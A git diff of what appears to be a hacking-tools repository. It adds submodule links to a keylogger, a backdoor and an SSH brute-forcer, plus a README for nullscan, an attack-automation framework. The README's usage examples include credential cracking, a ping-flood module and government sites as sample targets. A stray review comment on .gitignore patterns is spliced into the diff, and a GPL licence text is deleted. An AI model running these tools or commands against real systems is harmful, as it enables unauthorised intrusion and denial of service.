diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..b7aafa9
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,15 @@
+.swp
+.swn
+.swo
+.key
+.DS_Store
+.git
+.pyc
+__pycache__
+id_rsa
+id_dsa
+passwd
+shadow
+.bash_history
+.zsh_history
+.zhistory
diff --git a/.gitmodules b/.gitmodules
new file mode 100644
index 0000000..178ec3a
--- /dev/null
+++ b/.gitmodules
@@ -0,0 +1,30 @@
+[submodule "keylogger/ixkeylog/source"]
+ path = keylogger/ixkeylog/source
+ url = https://github.com/dorneanu/ixkeylog
+[submodule "misc/netgrafio/source"]
+ path = misc/netgrafio/source
+ url = https://github.com/dorneanu/netgrafio
+[submodule "scanner/smalisca/source"]
+ path = scanner/smalisca/source
+ url = https://github.com/dorneanu/smalisca
+[submodule "scanner/lulzbuster/source"]
+ path = scanner/lulzbuster/source
+ url = https://github.com/noptrix/lulzbuster
+[submodule "automation/nullscan/source"]
+ path = automation/nullscan/source
+ url = https://github.com/noptrix/nullscan
+[submodule "scanner/httpgrep/source"]
+ path = scanner/httpgrep/source
+ url = https://github.com/noptrix/httpgrep
+[submodule "cracker/sshprank/source"]
+ path = cracker/sshprank/source
+ url = https://github.com/noptrix/sshprank
+[submodule "misc/ipcountry/source"]
+ path = misc/ipcountry/source
+ url = https://github.com/noptrix/ipcountry
+[submodule "scanner/dnsspider/source"]
+ path = scanner/dnsspider/source
+ url = https://github.com/noptrix/dnsspider
+[submodule "backdoor/fbkit/source"]
+ path = backdoor/fbkit/source
+ url = https://github.com/noptrix/fbkit
diff --git a/README.md b/README.md
index aed7cfc..ff6d7cd 100644
--- a/README.md
+++ b/README.md
@@ -1,5 +1,4 @@
-About
-=====
+# About
 This section offers a selection of our fully featured security and hacking tools. We also provide some exploits, proof of concept code, shellcodes and snippets. That means some tools are not tested and may not have the feature set. 
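Review bot: The editor and key patterns in the new .gitignore match only a file whose entire name is the pattern, so `.swp`, `.swn`, `.swo`, `.key` and `.pyc` never ignore a swap file such as `.foo.swp`, a `server.key` or a compiled `foo.pyc` (constructed examples); each of those five entries needs a leading `*` (`*.swp`, `*.key`, `*.pyc` and so on) to do what the list evidently intends. `.git` is never a trackable path, so that line is a no-op and can be dropped. The bare names `id_rsa`, `id_dsa`, `passwd`, `shadow` and the shell-history files do match at any depth, but an ignore rule only affects future `git add` and does nothing for files already tracked or for a key stored under another name, so it is worth checking the existing tree and treating this list as a convenience rather than a control.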
@@ -7,9 +6,8 @@ That means some tools are not tested and may not have the feature set.
 If you find some bugs or if you have any questions, ideas or criticism regarding to this section, feel free to message us.
-Disclaimer
-==========
-We hereby emphasize, that the hacking related stuff on
-[nullsecurity.net](http://nullsecurity.net) is only for education purposes.
+# Disclaimer
+We hereby emphasize, that the hacking related stuff
+is only for education purposes.
 We are not responsible for any damages. You are responsible for your own actions.
diff --git a/automation/README.md b/automation/README.md
index 7145f5c..bc2a5d1 100644
--- a/automation/README.md
+++ b/automation/README.md
@@ -1,5 +1,4 @@
-About
-=====
+# About
 This section includes automation tools and wrapper scripts for well-known and public security tools to make your life easier. You can adjust the scripts fast and easily according to your own needs. Mostly written in bourne shell.
@@ -7,8 +6,7 @@ and easily according to your own needs. Mostly written in bourne shell.
 If you find some bugs or if you have any questions, ideas or criticism regarding to this section, feel free to message us.
-Disclaimer
-==========
+# Disclaimer
 We hereby emphasize, that the hacking related stuff on [nullsecurity.net](http://nullsecurity.net) is only for education purposes. We are not responsible for any damages. You are responsible for your own
diff --git a/automation/nullscan/README.md b/automation/nullscan/README.md
new file mode 100644
index 0000000..d9447c7
--- /dev/null
+++ b/automation/nullscan/README.md
@@ -0,0 +1,112 @@
+# Description
+A modular framework designed to chain and automate security tests. It parses
+target definitions from the command line and runs corresponding modules and
+their nullscan-tools afterwards. It can also take hosts and start nmap first in
+order to perform a basic portscan and run the modules afterwards. Also, nullscan
+can parse a given nmap logfile for open tcp and udp ports and again run the
+modules afterwards. All results will be logged in specified directories with a
+clean structure and a HTML report can subsequently be generated.
+
+This code is dedicated to my friend Zeljko (R.I.P.), who passed away,
+2nd Dec 2012.
+
+# Usage
+
+```
+[ hacker@blackarch ~ ]$ nullscan -H
+ ____
+ ____ __ __/ / /_____________ _____
+ / __ \/ / / / / / ___/ ___/ __ `/ __ \
+ / / / / /_/ / / (__ ) /__/ /_/ / / / /
+/_/ /_/\__,_/_/_/____/\___/\__,_/_/ /_/
+
+ --==[ by nullsecurity.net ]==--
+
+usage
+
+ nullscan [options] |
+
+modes
+
+ -t - hosts to scan via nmap and then attack - ? for info
+ -u - targets to attack directly via URIs - ? for info
+ -l - parse nmap xml logfile and attack hosts on open ports
+
+options
+
+ -o - extra options for modes - ? for info
+ -i - include modules (default: all) - ? for info
+ -I - include tools (default: all) - ? for info
+ -x - exclude modules (default: see nullscan.cfg) - ? for info
+ -X - exclude tools (default: see nullscan.cfg) - ? for info
+ -T - num workers for parallel target checks (default: 15)
+ -M - num workers to run parallel modules (default: 10)
+ -P - num workers to run parallel tools (default: 15)
+ -k - num seconds for tool (global) timeout (default: 0.0)
+ -r - generate an html report
+ -R - work, log and report dir (default: pwd + date)
+ -c - config file (default: /etc/nullscan.conf)
+ -v - verbose mode (default: false)
+ -d - debug mode (default: false)
+
+misc
+
+ -C - check for missing tools (recommended)
+ -p - print tools and exit - ? for info
+ -m - create and add a new module - ? for info
+ -a - add tool to existing module - ? for info
+ -V - print version of nullscan and exit
+ -H - print this help and exit
+
+examples
+
+ -t 192.168.0.0/24 -i tcp=ssh,http -r -I hydra_ssh,crack_http_auth
+
+ -u 'tcp://nsa.gov:80=http,22=ssh;udp://foo.bar:1337;
+ http://fbi.gov,https://cia.gov;mail://foo@bar.baz;
+ person://justin bieber,noptrix;lan://eth0,tap0;wifi://wlan0'
+ -o 'user=root;plists=/tmp/pwds.txt;rhost=192.168.0.1;
+ sport=1337;dirsearch_web=-o my -p "own opts" -c 1 -f 4;'
+
+ -n /tmp/scanned.xml -i 'host=icmp;tcp=default' -r
+
+ -l hosts.txt -X sqlmap,wpscan -v -o 'httping_web=-p cia.gov;
+ rpcdump_udp=-f foo -b bar;nmap=-sT,-n,-p-;'
+
+ -p 'tcp=ssh,http;host=zonetransfer;udp'
+
+ -m 'icmp/ping ping_flood ping -f -s 9999'
+
+ -a 'tcp/ssh crack_ssh sshcracker -c arg -f arg'
+```
+
+# Example
+
+[![asciicast](https://asciinema.org/a/kUNVbUEIde0e6vtsKiFi5neXb.png)](https://asciinema.org/a/kUNVbUEIde0e6vtsKiFi5neXb)
+
+# Installation
+
+Run `setup.sh`. Install needed python modules afterwards using `pip install -r docs/requirements.txt`.
+
+# Author
+
+noptrix
+
+# Notes
+
+- Please check the manpage from docs/nullscan.1
+- Use '?' option-value for any cmdline options. It gives you information for usage and examples.
+- clean code; real project
+- nullscan is already packaged and available for [BlackArch Linux](https://www.blackarch.org/)
+- My master-branches are always dev-branches; use releases for stable versions.
+- All of my public stuff you find are officially announced and published via [nullsecurity.net](https://www.nullsecurity.net).
+
+# License
+
+Check docs/LICENSE.
+
+# Disclaimer
+We hereby emphasize, that the hacking related stuff found on
+[nullsecurity.net](http://nullsecurity.net/) are only for education purposes.
+We are not responsible for any damages. You are responsible for your own
+actions.
diff --git a/automation/nullscan/release/nullscan-1.0.1.tar.gz b/automation/nullscan/release/nullscan-1.0.1.tar.gz
new file mode 100644
index 0000000..8c463bb
Binary files /dev/null and b/automation/nullscan/release/nullscan-1.0.1.tar.gz differ
diff --git a/automation/nullscan/source b/automation/nullscan/source
new file mode 160000
index 0000000..ef788fe
--- /dev/null
+++ b/automation/nullscan/source
@@ -0,0 +1 @@
+Subproject commit ef788feeb0c63bbbc5a6ca89f2304f7862a7b4fa
diff --git a/automation/sn00p/README.md b/automation/sn00p/README.md
deleted file mode 100644
index c749624..0000000
--- a/automation/sn00p/README.md
+++ /dev/null
@@ -1,22 +0,0 @@
-Description
-===========
-A modular tool written in bourne shell and designed to chain and automate
-security tools and tests. It parses target definitions from the command line and
-runs corresponding modules afterwards. sn00p can also parse a given nmap logfile
-for open tcp and udp ports. All results will be logged in specified directories
-and a report can subsequently be generated.
-
-MD5
-===
-1c43f2013de4503121385882a2201b27
-
-Author
-======
-noptrix
-
-Disclaimer
-==========
-We hereby emphasize, that the hacking related stuff on
-[nullsecurity.net](http://nullsecurity.net) is only for education purposes.
-We are not responsible for any damages. You are responsible for your own
-actions.
diff --git a/automation/sn00p/release/sn00p-0.8.tar.gz b/automation/sn00p/release/sn00p-0.8.tar.gz
deleted file mode 100644
index 01314f4..0000000
Binary files a/automation/sn00p/release/sn00p-0.8.tar.gz and /dev/null differ
diff --git a/automation/sn00p/source/README b/automation/sn00p/source/README
deleted file mode 120000
index a90f4af..0000000
--- a/automation/sn00p/source/README
+++ /dev/null
@@ -1 +0,0 @@
-docs/README
\ No newline at end of file
diff --git a/automation/sn00p/source/docs/AUTHORS b/automation/sn00p/source/docs/AUTHORS
deleted file mode 100644
index 94740d1..0000000
--- a/automation/sn00p/source/docs/AUTHORS
+++ /dev/null
@@ -1 +0,0 @@
-noptrix[at]nullsecurity.net - http://www.nullsecurity.net/
diff --git a/automation/sn00p/source/docs/CHANGELOG b/automation/sn00p/source/docs/CHANGELOG
deleted file mode 100644
index c371380..0000000
--- a/automation/sn00p/source/docs/CHANGELOG
+++ /dev/null
@@ -1 +0,0 @@
-See docs/TODO file for changes and todo list.
diff --git a/automation/sn00p/source/docs/COPYING b/automation/sn00p/source/docs/COPYING
deleted file mode 100644
index 94a9ed0..0000000
--- a/automation/sn00p/source/docs/COPYING
+++ /dev/null
@@ -1,674 +0,0 @@ - GNU GENERAL PUBLIC LICENSE - Version 3, 29 June 2007 - - Copyright (C) 2007 Free Software Foundation, Inc. - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - - Preamble - - The GNU General Public License is a free, copyleft license for -software and other kinds of works. - - The licenses for most software and other practical works are designed -to take away your freedom to share and change the works. By contrast, -the GNU General Public License is intended to guarantee your freedom to -share and change all versions of a program--to make sure it remains free -software for all its users. We, the Free Software Foundation, use the -GNU General Public License for most of our software; it applies also to -any other work released this way by its authors. You can apply it to -your programs, too. - - When we speak of free software, we are referring to freedom, not -price. Our General Public Licenses are designed to make sure that you -have the freedom to distribute copies of free software (and charge for -them if you wish), that you receive source code or can get it if you -want it, that you can change the software or use pieces of it in new -free programs, and that you know you can do these things. - - To protect your rights, we need to prevent others from denying you -these rights or asking you to surrender the rights. Therefore, you have -certain responsibilities if you distribute copies of the software, or if -you modify it: responsibilities to respect the freedom of others. - - For example, if you distribute copies of such a program, whether -gratis or for a fee, you must pass on to the recipients the same -freedoms that you received. You must make sure that they, too, receive -or can get the source code. And you must show them these terms so they -know their rights. 
- - Developers that use the GNU GPL protect your rights with two steps: -(1) assert copyright on the software, and (2) offer you this License -giving you legal permission to copy, distribute and/or modify it. - - For the developers' and authors' protection, the GPL clearly explains -that there is no warranty for this free software. For both users' and -authors' sake, the GPL requires that modified versions be marked as -changed, so that their problems will not be attributed erroneously to -authors of previous versions. - - Some devices are designed to deny users access to install or run -modified versions of the software inside them, although the manufacturer -can do so. This is fundamentally incompatible with the aim of -protecting users' freedom to change the software. The systematic -pattern of such abuse occurs in the area of products for individuals to -use, which is precisely where it is most unacceptable. Therefore, we -have designed this version of the GPL to prohibit the practice for those -products. If such problems arise substantially in other domains, we -stand ready to extend this provision to those domains in future versions -of the GPL, as needed to protect the freedom of users. - - Finally, every program is threatened constantly by software patents. -States should not allow patents to restrict development and use of -software on general-purpose computers, but in those that do, we wish to -avoid the special danger that patents applied to a free program could -make it effectively proprietary. To prevent this, the GPL assures that -patents cannot be used to render the program non-free. - - The precise terms and conditions for copying, distribution and -modification follow. - - TERMS AND CONDITIONS - - 0. Definitions. - - "This License" refers to version 3 of the GNU General Public License. - - "Copyright" also means copyright-like laws that apply to other kinds of -works, such as semiconductor masks. 
- - "The Program" refers to any copyrightable work licensed under this -License. Each licensee is addressed as "you". "Licensees" and -"recipients" may be individuals or organizations. - - To "modify" a work means to copy from or adapt all or part of the work -in a fashion requiring copyright permission, other than the making of an -exact copy. The resulting work is called a "modified version" of the -earlier work or a work "based on" the earlier work. - - A "covered work" means either the unmodified Program or a work based -on the Program. - - To "propagate" a work means to do anything with it that, without -permission, would make you directly or secondarily liable for -infringement under applicable copyright law, except executing it on a -computer or modifying a private copy. Propagation includes copying, -distribution (with or without modification), making available to the -public, and in some countries other activities as well. - - To "convey" a work means any kind of propagation that enables other -parties to make or receive copies. Mere interaction with a user through -a computer network, with no transfer of a copy, is not conveying. - - An interactive user interface displays "Appropriate Legal Notices" -to the extent that it includes a convenient and prominently visible -feature that (1) displays an appropriate copyright notice, and (2) -tells the user that there is no warranty for the work (except to the -extent that warranties are provided), that licensees may convey the -work under this License, and how to view a copy of this License. If -the interface presents a list of user commands or options, such as a -menu, a prominent item in the list meets this criterion. - - 1. Source Code. - - The "source code" for a work means the preferred form of the work -for making modifications to it. "Object code" means any non-source -form of a work. 
- - A "Standard Interface" means an interface that either is an official -standard defined by a recognized standards body, or, in the case of -interfaces specified for a particular programming language, one that -is widely used among developers working in that language. - - The "System Libraries" of an executable work include anything, other -than the work as a whole, that (a) is included in the normal form of -packaging a Major Component, but which is not part of that Major -Component, and (b) serves only to enable use of the work with that -Major Component, or to implement a Standard Interface for which an -implementation is available to the public in source code form. A -"Major Component", in this context, means a major essential component -(kernel, window system, and so on) of the specific operating system -(if any) on which the executable work runs, or a compiler used to -produce the work, or an object code interpreter used to run it. - - The "Corresponding Source" for a work in object code form means all -the source code needed to generate, install, and (for an executable -work) run the object code and to modify the work, including scripts to -control those activities. However, it does not include the work's -System Libraries, or general-purpose tools or generally available free -programs which are used unmodified in performing those activities but -which are not part of the work. For example, Corresponding Source -includes interface definition files associated with source files for -the work, and the source code for shared libraries and dynamically -linked subprograms that the work is specifically designed to require, -such as by intimate data communication or control flow between those -subprograms and other parts of the work. - - The Corresponding Source need not include anything that users -can regenerate automatically from other parts of the Corresponding -Source. - - The Corresponding Source for a work in source code form is that -same work. - - 2. 
Basic Permissions. - - All rights granted under this License are granted for the term of -copyright on the Program, and are irrevocable provided the stated -conditions are met. This License explicitly affirms your unlimited -permission to run the unmodified Program. The output from running a -covered work is covered by this License only if the output, given its -content, constitutes a covered work. This License acknowledges your -rights of fair use or other equivalent, as provided by copyright law. - - You may make, run and propagate covered works that you do not -convey, without conditions so long as your license otherwise remains -in force. You may convey covered works to others for the sole purpose -of having them make modifications exclusively for you, or provide you -with facilities for running those works, provided that you comply with -the terms of this License in conveying all material for which you do -not control copyright. Those thus making or running the covered works -for you must do so exclusively on your behalf, under your direction -and control, on terms that prohibit them from making any copies of -your copyrighted material outside their relationship with you. - - Conveying under any other circumstances is permitted solely under -the conditions stated below. Sublicensing is not allowed; section 10 -makes it unnecessary. - - 3. Protecting Users' Legal Rights From Anti-Circumvention Law. - - No covered work shall be deemed part of an effective technological -measure under any applicable law fulfilling obligations under article -11 of the WIPO copyright treaty adopted on 20 December 1996, or -similar laws prohibiting or restricting circumvention of such -measures. 
- - When you convey a covered work, you waive any legal power to forbid -circumvention of technological measures to the extent such circumvention -is effected by exercising rights under this License with respect to -the covered work, and you disclaim any intention to limit operation or -modification of the work as a means of enforcing, against the work's -users, your or third parties' legal rights to forbid circumvention of -technological measures. - - 4. Conveying Verbatim Copies. - - You may convey verbatim copies of the Program's source code as you -receive it, in any medium, provided that you conspicuously and -appropriately publish on each copy an appropriate copyright notice; -keep intact all notices stating that this License and any -non-permissive terms added in accord with section 7 apply to the code; -keep intact all notices of the absence of any warranty; and give all -recipients a copy of this License along with the Program. - - You may charge any price or no price for each copy that you convey, -and you may offer support or warranty protection for a fee. - - 5. Conveying Modified Source Versions. - - You may convey a work based on the Program, or the modifications to -produce it from the Program, in the form of source code under the -terms of section 4, provided that you also meet all of these conditions: - - a) The work must carry prominent notices stating that you modified - it, and giving a relevant date. - - b) The work must carry prominent notices stating that it is - released under this License and any conditions added under section - 7. This requirement modifies the requirement in section 4 to - "keep intact all notices". - - c) You must license the entire work, as a whole, under this - License to anyone who comes into possession of a copy. This - License will therefore apply, along with any applicable section 7 - additional terms, to the whole of the work, and all its parts, - regardless of how they are packaged. 
This License gives no - permission to license the work in any other way, but it does not - invalidate such permission if you have separately received it. - - d) If the work has interactive user interfaces, each must display - Appropriate Legal Notices; however, if the Program has interactive - interfaces that do not display Appropriate Legal Notices, your - work need not make them do so. - - A compilation of a covered work with other separate and independent -works, which are not by their nature extensions of the covered work, -and which are not combined with it such as to form a larger program, -in or on a volume of a storage or distribution medium, is called an -"aggregate" if the compilation and its resulting copyright are not -used to limit the access or legal rights of the compilation's users -beyond what the individual works permit. Inclusion of a covered work -in an aggregate does not cause this License to apply to the other -parts of the aggregate. - - 6. Conveying Non-Source Forms. - - You may convey a covered work in object code form under the terms -of sections 4 and 5, provided that you also convey the -machine-readable Corresponding Source under the terms of this License, -in one of these ways: - - a) Convey the object code in, or embodied in, a physical product - (including a physical distribution medium), accompanied by the - Corresponding Source fixed on a durable physical medium - customarily used for software interchange. 
- - b) Convey the object code in, or embodied in, a physical product - (including a physical distribution medium), accompanied by a - written offer, valid for at least three years and valid for as - long as you offer spare parts or customer support for that product - model, to give anyone who possesses the object code either (1) a - copy of the Corresponding Source for all the software in the - product that is covered by this License, on a durable physical - medium customarily used for software interchange, for a price no - more than your reasonable cost of physically performing this - conveying of source, or (2) access to copy the - Corresponding Source from a network server at no charge. - - c) Convey individual copies of the object code with a copy of the - written offer to provide the Corresponding Source. This - alternative is allowed only occasionally and noncommercially, and - only if you received the object code with such an offer, in accord - with subsection 6b. - - d) Convey the object code by offering access from a designated - place (gratis or for a charge), and offer equivalent access to the - Corresponding Source in the same way through the same place at no - further charge. You need not require recipients to copy the - Corresponding Source along with the object code. If the place to - copy the object code is a network server, the Corresponding Source - may be on a different server (operated by you or a third party) - that supports equivalent copying facilities, provided you maintain - clear directions next to the object code saying where to find the - Corresponding Source. Regardless of what server hosts the - Corresponding Source, you remain obligated to ensure that it is - available for as long as needed to satisfy these requirements. 
- - e) Convey the object code using peer-to-peer transmission, provided - you inform other peers where the object code and Corresponding - Source of the work are being offered to the general public at no - charge under subsection 6d. - - A separable portion of the object code, whose source code is excluded -from the Corresponding Source as a System Library, need not be -included in conveying the object code work. - - A "User Product" is either (1) a "consumer product", which means any -tangible personal property which is normally used for personal, family, -or household purposes, or (2) anything designed or sold for incorporation -into a dwelling. In determining whether a product is a consumer product, -doubtful cases shall be resolved in favor of coverage. For a particular -product received by a particular user, "normally used" refers to a -typical or common use of that class of product, regardless of the status -of the particular user or of the way in which the particular user -actually uses, or expects or is expected to use, the product. A product -is a consumer product regardless of whether the product has substantial -commercial, industrial or non-consumer uses, unless such uses represent -the only significant mode of use of the product. - - "Installation Information" for a User Product means any methods, -procedures, authorization keys, or other information required to install -and execute modified versions of a covered work in that User Product from -a modified version of its Corresponding Source. The information must -suffice to ensure that the continued functioning of the modified object -code is in no case prevented or interfered with solely because -modification has been made. 
- - If you convey an object code work under this section in, or with, or -specifically for use in, a User Product, and the conveying occurs as -part of a transaction in which the right of possession and use of the -User Product is transferred to the recipient in perpetuity or for a -fixed term (regardless of how the transaction is characterized), the -Corresponding Source conveyed under this section must be accompanied -by the Installation Information. But this requirement does not apply -if neither you nor any third party retains the ability to install -modified object code on the User Product (for example, the work has -been installed in ROM). - - The requirement to provide Installation Information does not include a -requirement to continue to provide support service, warranty, or updates -for a work that has been modified or installed by the recipient, or for -the User Product in which it has been modified or installed. Access to a -network may be denied when the modification itself materially and -adversely affects the operation of the network or violates the rules and -protocols for communication across the network. - - Corresponding Source conveyed, and Installation Information provided, -in accord with this section must be in a format that is publicly -documented (and with an implementation available to the public in -source code form), and must require no special password or key for -unpacking, reading or copying. - - 7. Additional Terms. - - "Additional permissions" are terms that supplement the terms of this -License by making exceptions from one or more of its conditions. -Additional permissions that are applicable to the entire Program shall -be treated as though they were included in this License, to the extent -that they are valid under applicable law. 
If additional permissions -apply only to part of the Program, that part may be used separately -under those permissions, but the entire Program remains governed by -this License without regard to the additional permissions. - - When you convey a copy of a covered work, you may at your option -remove any additional permissions from that copy, or from any part of -it. (Additional permissions may be written to require their own -removal in certain cases when you modify the work.) You may place -additional permissions on material, added by you to a covered work, -for which you have or can give appropriate copyright permission. - - Notwithstanding any other provision of this License, for material you -add to a covered work, you may (if authorized by the copyright holders of -that material) supplement the terms of this License with terms: - - a) Disclaiming warranty or limiting liability differently from the - terms of sections 15 and 16 of this License; or - - b) Requiring preservation of specified reasonable legal notices or - author attributions in that material or in the Appropriate Legal - Notices displayed by works containing it; or - - c) Prohibiting misrepresentation of the origin of that material, or - requiring that modified versions of such material be marked in - reasonable ways as different from the original version; or - - d) Limiting the use for publicity purposes of names of licensors or - authors of the material; or - - e) Declining to grant rights under trademark law for use of some - trade names, trademarks, or service marks; or - - f) Requiring indemnification of licensors and authors of that - material by anyone who conveys the material (or modified versions of - it) with contractual assumptions of liability to the recipient, for - any liability that these contractual assumptions directly impose on - those licensors and authors. - - All other non-permissive additional terms are considered "further -restrictions" within the meaning of section 10. 
If the Program as you -received it, or any part of it, contains a notice stating that it is -governed by this License along with a term that is a further -restriction, you may remove that term. If a license document contains -a further restriction but permits relicensing or conveying under this -License, you may add to a covered work material governed by the terms -of that license document, provided that the further restriction does -not survive such relicensing or conveying. - - If you add terms to a covered work in accord with this section, you -must place, in the relevant source files, a statement of the -additional terms that apply to those files, or a notice indicating -where to find the applicable terms. - - Additional terms, permissive or non-permissive, may be stated in the -form of a separately written license, or stated as exceptions; -the above requirements apply either way. - - 8. Termination. - - You may not propagate or modify a covered work except as expressly -provided under this License. Any attempt otherwise to propagate or -modify it is void, and will automatically terminate your rights under -this License (including any patent licenses granted under the third -paragraph of section 11). - - However, if you cease all violation of this License, then your -license from a particular copyright holder is reinstated (a) -provisionally, unless and until the copyright holder explicitly and -finally terminates your license, and (b) permanently, if the copyright -holder fails to notify you of the violation by some reasonable means -prior to 60 days after the cessation. - - Moreover, your license from a particular copyright holder is -reinstated permanently if the copyright holder notifies you of the -violation by some reasonable means, this is the first time you have -received notice of violation of this License (for any work) from that -copyright holder, and you cure the violation prior to 30 days after -your receipt of the notice. 
- - Termination of your rights under this section does not terminate the -licenses of parties who have received copies or rights from you under -this License. If your rights have been terminated and not permanently -reinstated, you do not qualify to receive new licenses for the same -material under section 10. - - 9. Acceptance Not Required for Having Copies. - - You are not required to accept this License in order to receive or -run a copy of the Program. Ancillary propagation of a covered work -occurring solely as a consequence of using peer-to-peer transmission -to receive a copy likewise does not require acceptance. However, -nothing other than this License grants you permission to propagate or -modify any covered work. These actions infringe copyright if you do -not accept this License. Therefore, by modifying or propagating a -covered work, you indicate your acceptance of this License to do so. - - 10. Automatic Licensing of Downstream Recipients. - - Each time you convey a covered work, the recipient automatically -receives a license from the original licensors, to run, modify and -propagate that work, subject to this License. You are not responsible -for enforcing compliance by third parties with this License. - - An "entity transaction" is a transaction transferring control of an -organization, or substantially all assets of one, or subdividing an -organization, or merging organizations. If propagation of a covered -work results from an entity transaction, each party to that -transaction who receives a copy of the work also receives whatever -licenses to the work the party's predecessor in interest had or could -give under the previous paragraph, plus a right to possession of the -Corresponding Source of the work from the predecessor in interest, if -the predecessor has it or can get it with reasonable efforts. - - You may not impose any further restrictions on the exercise of the -rights granted or affirmed under this License. 
For example, you may -not impose a license fee, royalty, or other charge for exercise of -rights granted under this License, and you may not initiate litigation -(including a cross-claim or counterclaim in a lawsuit) alleging that -any patent claim is infringed by making, using, selling, offering for -sale, or importing the Program or any portion of it. - - 11. Patents. - - A "contributor" is a copyright holder who authorizes use under this -License of the Program or a work on which the Program is based. The -work thus licensed is called the contributor's "contributor version". - - A contributor's "essential patent claims" are all patent claims -owned or controlled by the contributor, whether already acquired or -hereafter acquired, that would be infringed by some manner, permitted -by this License, of making, using, or selling its contributor version, -but do not include claims that would be infringed only as a -consequence of further modification of the contributor version. For -purposes of this definition, "control" includes the right to grant -patent sublicenses in a manner consistent with the requirements of -this License. - - Each contributor grants you a non-exclusive, worldwide, royalty-free -patent license under the contributor's essential patent claims, to -make, use, sell, offer for sale, import and otherwise run, modify and -propagate the contents of its contributor version. - - In the following three paragraphs, a "patent license" is any express -agreement or commitment, however denominated, not to enforce a patent -(such as an express permission to practice a patent or covenant not to -sue for patent infringement). To "grant" such a patent license to a -party means to make such an agreement or commitment not to enforce a -patent against the party. 
- - If you convey a covered work, knowingly relying on a patent license, -and the Corresponding Source of the work is not available for anyone -to copy, free of charge and under the terms of this License, through a -publicly available network server or other readily accessible means, -then you must either (1) cause the Corresponding Source to be so -available, or (2) arrange to deprive yourself of the benefit of the -patent license for this particular work, or (3) arrange, in a manner -consistent with the requirements of this License, to extend the patent -license to downstream recipients. "Knowingly relying" means you have -actual knowledge that, but for the patent license, your conveying the -covered work in a country, or your recipient's use of the covered work -in a country, would infringe one or more identifiable patents in that -country that you have reason to believe are valid. - - If, pursuant to or in connection with a single transaction or -arrangement, you convey, or propagate by procuring conveyance of, a -covered work, and grant a patent license to some of the parties -receiving the covered work authorizing them to use, propagate, modify -or convey a specific copy of the covered work, then the patent license -you grant is automatically extended to all recipients of the covered -work and works based on it. - - A patent license is "discriminatory" if it does not include within -the scope of its coverage, prohibits the exercise of, or is -conditioned on the non-exercise of one or more of the rights that are -specifically granted under this License. 
You may not convey a covered -work if you are a party to an arrangement with a third party that is -in the business of distributing software, under which you make payment -to the third party based on the extent of your activity of conveying -the work, and under which the third party grants, to any of the -parties who would receive the covered work from you, a discriminatory -patent license (a) in connection with copies of the covered work -conveyed by you (or copies made from those copies), or (b) primarily -for and in connection with specific products or compilations that -contain the covered work, unless you entered into that arrangement, -or that patent license was granted, prior to 28 March 2007. - - Nothing in this License shall be construed as excluding or limiting -any implied license or other defenses to infringement that may -otherwise be available to you under applicable patent law. - - 12. No Surrender of Others' Freedom. - - If conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot convey a -covered work so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you may -not convey it at all. For example, if you agree to terms that obligate you -to collect a royalty for further conveying from those to whom you convey -the Program, the only way you could satisfy both those terms and this -License would be to refrain entirely from conveying the Program. - - 13. Use with the GNU Affero General Public License. - - Notwithstanding any other provision of this License, you have -permission to link or combine any covered work with a work licensed -under version 3 of the GNU Affero General Public License into a single -combined work, and to convey the resulting work. 
The terms of this -License will continue to apply to the part which is the covered work, -but the special requirements of the GNU Affero General Public License, -section 13, concerning interaction through a network will apply to the -combination as such. - - 14. Revised Versions of this License. - - The Free Software Foundation may publish revised and/or new versions of -the GNU General Public License from time to time. Such new versions will -be similar in spirit to the present version, but may differ in detail to -address new problems or concerns. - - Each version is given a distinguishing version number. If the -Program specifies that a certain numbered version of the GNU General -Public License "or any later version" applies to it, you have the -option of following the terms and conditions either of that numbered -version or of any later version published by the Free Software -Foundation. If the Program does not specify a version number of the -GNU General Public License, you may choose any version ever published -by the Free Software Foundation. - - If the Program specifies that a proxy can decide which future -versions of the GNU General Public License can be used, that proxy's -public statement of acceptance of a version permanently authorizes you -to choose that version for the Program. - - Later license versions may give you additional or different -permissions. However, no additional obligations are imposed on any -author or copyright holder as a result of your choosing to follow a -later version. - - 15. Disclaimer of Warranty. - - THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY -APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT -HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY -OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, -THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR -PURPOSE. 
THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM -IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF -ALL NECESSARY SERVICING, REPAIR OR CORRECTION. - - 16. Limitation of Liability. - - IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING -WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS -THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY -GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE -USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF -DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD -PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), -EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF -SUCH DAMAGES. - - 17. Interpretation of Sections 15 and 16. - - If the disclaimer of warranty and limitation of liability provided -above cannot be given local legal effect according to their terms, -reviewing courts shall apply local law that most closely approximates -an absolute waiver of all civil liability in connection with the -Program, unless a warranty or assumption of liability accompanies a -copy of the Program in return for a fee. - - END OF TERMS AND CONDITIONS - - How to Apply These Terms to Your New Programs - - If you develop a new program, and you want it to be of the greatest -possible use to the public, the best way to achieve this is to make it -free software which everyone can redistribute and change under these terms. - - To do so, attach the following notices to the program. It is safest -to attach them to the start of each source file to most effectively -state the exclusion of warranty; and each file should have at least -the "copyright" line and a pointer to where the full notice is found. 
